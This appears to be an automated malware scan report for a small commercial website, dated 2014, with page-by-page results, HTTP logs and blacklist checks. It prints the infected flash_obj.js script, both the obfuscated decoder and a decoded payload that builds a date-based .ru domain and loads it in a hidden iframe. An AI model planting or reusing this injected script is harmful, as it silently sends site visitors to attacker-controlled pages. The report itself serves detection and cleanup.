Scanned pages/files
Request | Server response | Status |
http://alumina-goods.com/ | 200 OK Content-Length: 31204 Content-Type: text/html | clean |
http://alumina-goods.com/flash_obj.js | 200 OK Content-Length: 5961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function flash_obj(obj,width,height) { htmlstr="<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\""+width+"\" height=\""+height+"\">"; htmlstr+="<param name=\"movie\" value=\""+obj+"\">"; htmlstr+="<param name=\"quality\" value=\"high\">"; htmlstr+="<param name=\"wmode\" value=\"transparent\">"; htmlstr+=" r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://alumina-goods.com/index.asp | 200 OK Content-Length: 31204 Content-Type: text/html | clean |
http://alumina-goods.com/company.asp | 200 OK Content-Length: 27428 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp | 200 OK Content-Length: 30125 Content-Type: text/html | clean |
http://alumina-goods.com/quality.asp | 200 OK Content-Length: 26426 Content-Type: text/html | clean |
http://alumina-goods.com/dload.asp | 200 OK Content-Length: 27503 Content-Type: text/html | clean |
http://alumina-goods.com/liuyan.asp?action=Add_New | 200 OK Content-Length: 36175 Content-Type: text/html | clean |
http://alumina-goods.com/contact.asp | 200 OK Content-Length: 26760 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=2 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=1 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=3 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=5 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=6 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=11 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alumina-goods.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 21 Jun 2014 23:39:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31204
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSCSBCADT=PFKBNLADDFGJMNJMJFNCLJBL; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...31204 bytes of data.
GET / HTTP/1.1
Host: alumina-goods.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 21 Jun 2014 23:39:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31204
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSCSBCADT=PFKBNLADDFGJMNJMJFNCLJBL; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...31204 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alumina-goods.com
Referer: http://www.google.com/search?q=alumina-goods.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alumina-goods.com
Referer: http://www.google.com/search?q=alumina-goods.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alumina-goods.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alumina-goods.com/
Result: alumina-goods.com is not infected or malware details are not published yet.
Result: alumina-goods.com is not infected or malware details are not published yet.